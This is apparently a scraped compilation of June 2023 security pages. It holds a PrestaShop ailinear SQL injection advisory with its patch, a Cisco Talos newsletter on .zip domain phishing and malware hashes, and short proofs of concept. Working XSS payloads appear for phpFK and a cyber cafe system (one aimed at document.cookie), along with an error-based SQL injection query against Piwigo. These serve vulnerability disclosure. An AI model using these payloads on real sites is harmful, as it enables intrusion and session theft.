Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

CVE-2023-32027

CVE-2023-32026

CVE-2023-29356

CVE-2023-32025

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Forcepoint Cloud Security Gateway (CSG) Portal on Web Cloud Security Gateway, Email Security Cloud allows Blind SQL Injection.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-2080: Forcepoint Customer Hub

In the PrestaShop < 2.4.3 module "Length, weight or volume sell" (ailinear) there is a SQL injection vulnerability.

In the module “Length, weight or volume sell” (ailinear) for PrestaShop, an attacker can perform SQL injection up to 2.4.3. Release 2.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-31672
*   **Published at**: 2023-06-15
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: ailinear
*   **Impacted release**: < 2.4.3 (2.4.3 fixed the vulnerability)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 2.4.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted others and more variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Patch**

    --- a/ailinear/includes/ajax.php
    +++ b/ailinear/includes/ajax.php
    @@ -346,17 +346,23 @@ if (Tools::getIsset('action')) {
         $request_value = Tools::getIsset('value') ? Tools::getValue('value') : 0;
         $request_product = (int)Tools::getValue('product');
         $request_more = Tools::getValue('more');
    -    $request_others = Tools::getValue('others');
    +    $request_others = (int)Tools::getValue('others');
         $request_quantity = (int)Tools::getValue('qty');
     
         /* Test if base combination exists */
         if ($request_more != '') {
    -        $more = explode('_', $request_more);
    +        $more_attributes = explode('_', $request_more);
    +        $more_attributes = array_map('intval', $more_attributes);
    +        foreach ($more_attributes as $key => $attr) {
    +            if (!$attr) {
    +                unset($more_attributes[$key]);
    +            }
    +        }
             
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS(
                 'SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute_combination WHERE id_product_attribute IN (SELECT id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE '.
    -            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more).') GROUP BY id_product_attribute HAVING number = '.count($more).' ORDER BY id_product_attribute ASC'
    +            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more_attributes).') GROUP BY id_product_attribute HAVING number = '.count($more_attributes).' ORDER BY id_product_attribute ASC'
             );
             
             /* Get the attributes values and lang for the product */
    @@ -364,6 +370,8 @@ if (Tools::getIsset('action')) {
                 die('Unknown');
             }
         } else {
    +        $more_attributes = array();
    +        
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS('SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE id_product = '.$request_product.' ORDER BY id_product_attribute ASC');
         }
    @@ -373,13 +381,6 @@ if (Tools::getIsset('action')) {
             $return = 'Message->'.$module->l('Message for delayed preparation', 'ajax').'|';
         }
     
    -    /* Get attributes */
    -    if ($request_more != '') {
    -        $more_attributes = explode('_', $request_more);
    -    } else {
    -        $more_attributes = array();
    -    }
    -
         /* Get price changes */
         $more_attributes_price = 0;
         if (count($more_attributes)) {
    

**Other recommendations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-03-08

Vunlnerability found during a audit by 202 ecommerce

2023-03-08

Contact the author

2023-03-08

The author confirm the issue and supply a fixed release

2023-04-23

Request a CVE ID

2023-06-15

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-31672: [CVE-2023-31672] Improper neutralization of an SQL parameter in ailinear module for PrestaShop

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

The information leak threats are certainly new, but the education and messaging from security evangelists (and even just anyone trying to educate an older or less security-savvy family member) doesn’t change.

Thursday, June 15, 2023 14:06

Welcome to this week’s edition of the Threat Source newsletter.

Talos’ recent blog post on the dangers posed by the newly released “.zip” top-level domain (TLD) recently outlined how threat actors could create real URLs that look like file names and trick users into clicking on their links. .Zip and other TLDs that share characters with filename extensions also opens the door to accidental information leaks.

But these are far from the first TLDs to be problematic for users, especially those who are less educated about the verbiage that makes the internet work as intended.

The same day .zip was released as a TLD for anyone to register, the Internet Corporation for Assigned Names and Numbers (ICANN) also made .mov available as a TLD. The tricks here are obvious — think of someone who would see a file named “WeddingVideo.mov” and just assume it was from their legitimate family member.

(As a side note, I very much want to own jon.dad now, as .dad is also a TLD released in this batch.)

Attackers have long used tricky URLs to lure victims, though. We’ve written several times about how typo-squatted domains are used in cyber attacks. This is when an adversary takes a legitimate URL like twitter.com and uses a slightly modified version to make it just close enough that it looks like the real thing, like tvitter\[.\]com or twltter\[.\]com. And there are a variety of ways any slight DNS misconfiguration (which goes beyond just typing the URL into a browser window) could lead to information leaks or phishing lures.

The ever-present .com is also a common TLD that gets used to stand up legitimate-looking names for actors.

As security researcher and content creator Bobby Rauch pointed out in this recent post on Medium, attackers have used legitimate websites to mask malicious URLs to avoid detection and suspicion from the target.

For example, they can insert the “@” operator in a website URL to send someone to a different website, even though it may look legitimate.

The URL https://google\[.\]com@bing\[.\]com actually takes the user to bing.com even though it looks like it will send them to Google initially. Regardless of the TLD used there, an attacker could leverage it to trick someone who isn’t savvy enough to examine each detail of a URL.

There are other TLDs that could easily be used in convincing phishing emails or lure documents: .media is a long-available TLD that could easily be worked into a seemingly legitimate-looking file, and I’m assuming I wasn’t the only person to ever assume that the .run TLD could double as a file extension for a Mac driver.

There are certain dangers that .zip and .mov URLs pose to users, but we’ve always known that everyone needs to quadruple-check the URL they plan on visiting. The information leak threats are certainly new, but the education and messaging from security evangelists (and even just anyone trying to educate an older or less security-savvy family member) doesn’t change.

**The one big thing**

June’s Patch Tuesday is the first in a while in which Microsoft’s security updates didn’t include a warning against a zero-day vulnerability. Each of the previous four months included at least one issue that attackers were actively exploited in the wild. Still, Microsoft disclosed almost 70 vulnerabilities across its suite of software and hardware, including several that are “more likely” to be exploited. Cisco Talos specifically discovered two vulnerabilities in Microsoft Excel that the company patched Tuesday. These are important-severity remote code execution vulnerabilities that are triggered if the targeted user opens an attacker-created file.

**Why do I care?**

It’s certainly good news that there are no new zero-days included in this week’s Patch Tuesday — we’ve had enough of those already this year across all software manufacturers. But there are multiple vulnerabilities that are critical and have a very high severity score of 9.8 out of 10 that should be patched immediately.

**So now what?**

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. All Microsoft users should patch immediately or take appropriate mitigation steps as outlined in these advisories. Talos also released several Snort rules that can detect the exploitation of these vulnerabilities or block the attacker from taking malicious actions.

**Top security headlines of the week**

Progress Software released patches for several security vulnerabilities it discovered in its MOVEit file transfer software while researching a high-profile zero-day that has already led to multiple data breaches across the globe. The advisory for the new vulnerabilities states that they “could potentially be used by a bad actor to stage an exploit” but, currently, there is no evidence that they have been exploited in the wild. Security researchers have also published new proof of concept code to exploit CVE-2023-34362, the zero-day in MOVEit, which found that an attacker could exploit the issue to execute remote code on the targeted machine. It previously had only been identified as an SQL injection issue. Attackers have exploited CVE-2023-34362 to steal data from organizations using MOVEit, including the BBC, the Minnesota Department of Education and the Canadian province of Nova Scotia. (SecurityWeek, SC Media)

A group of high-profile American investors is reportedly considering purchasing assets belonging to NSO Group, the Israeli tech firm behind the infamous Pegasus spyware. The potential buyers include a financier who’s long been involved in Hollywood movies and a family member behind the Wrigley’s gum brand. Security experts and journalists have wondered about the financial status of NSO Group after it was added to the U.S. Department of Commerce’s list that bans the U.S. government and American companies from doing business with them. Meanwhile, the NSO Group has also reportedly been paying high-profile lobbying groups in D.C. to try and convince Congress to move the company from the banned list. The materials used by the lobbying groups reportedly state that the NSO Group’s software has a new “human rights governance compliance program.” (The Guardian, Haaretz)

America’s top cybersecurity official warned of the dangers of cyber attacks from Chinese state-sponsored actors, warning that critical infrastructure would become a key target in the event of a military conflict with China. Jen Easterly, speaking at an appearance at the Aspen Institute this week, said that China’s cyber espionage and offensive capabilities are an “epoch-defining threat.” Easterly, the director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), said Chinese threat actors were also likely to carry out cyber attacks against American infrastructure, like oil pipelines and electrical grids, should the two countries ever get into a kinetic military conflict. National security experts have long warned about a U.S.-China conflict if China ever invaded Taiwan. "Given the formidable nature of the threat from Chinese state actors, given the size of their capability, given how much resources and effort they're putting into it, it's going to be very, very difficult for us to prevent disruptions from happening," Easterly said. (CNBC, Reuters)

**Can’t get enough Talos?**

*   Talos Takes Ep. #142: Horabot is here to do "horable" things to your email inbox
*   The Need to Know: What does it mean when ransomware actors use “double extortion” tactics?
*   Vulnerability Spotlight: Two remote code execution vulnerabilities disclosed in Microsoft Excel
*   Threat Roundup for June 2 - 9
*   ThreatWise TV: Snort trends

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848  
**MD5:** 8cb26e5b687cafb66e65e4fc71ec4d63  
**Typical Filename:** dattService.exe  
**Claimed Product:** Datto Service Monito  
**Detection Name:** W32.Auto:a8a6d6.in03.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b  
**MD5:** f5e908f1fac5f98ec63e3ec355ef6279  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::tpd

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

URLs have always been a great hiding place for threat actors

Cross-site scripting (XSS) vulnerability in Phpgurukul Cyber Cafe Management System 1.0 allows remote attackers to inject arbitrary web script or HTML via the admin username parameter.

    # Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
    # Date: 04-12-2020
    # Exploit Author: Pruthvi Nekkanti
    # Vendor Homepage: https://phpgurukul.com
    # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    # Version: 1.0
    # Tested on: Kali Linux
    
    Attack vector:
    This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
    
    Vulnerable Parameters: Admin Username.
    
    Steps-To-Reproduce:
    1. Go to the Product admin panel change the admin username
    2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
    3. Now go to the website and the XSS will be triggered.

CVE-2023-34666: OffSec’s Exploit Database Archive

Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function.

Access the 'Users' function and use the filter function  

Observe the request on Burp Suite  

Manipulate the 'order' or 'exclude\[\]' parameter by adding a single quote, and an error in MYSQL shows up, proving the existence of SQL injection  

We can try to retrieve all the databases name with the error-based payload id AND (SELECT 2690 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,51) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) , just increasing the LIMIT value to enumerate all the databases name  

Analyze the vulnerability from the source code, locate the ws\_users\_getList() function (/piwigo/include/ws\_functions/pwg.users.php), notice that 'order' was concat directly after the 'ORDER BY' clause without any kind of input sanitization. The same case happens for  
the 'exclude\[\]' parameter  

This vulnerability affects the latest version up to 13.7.0, and it is uncertain if other versions will be affected.

Tag

#sql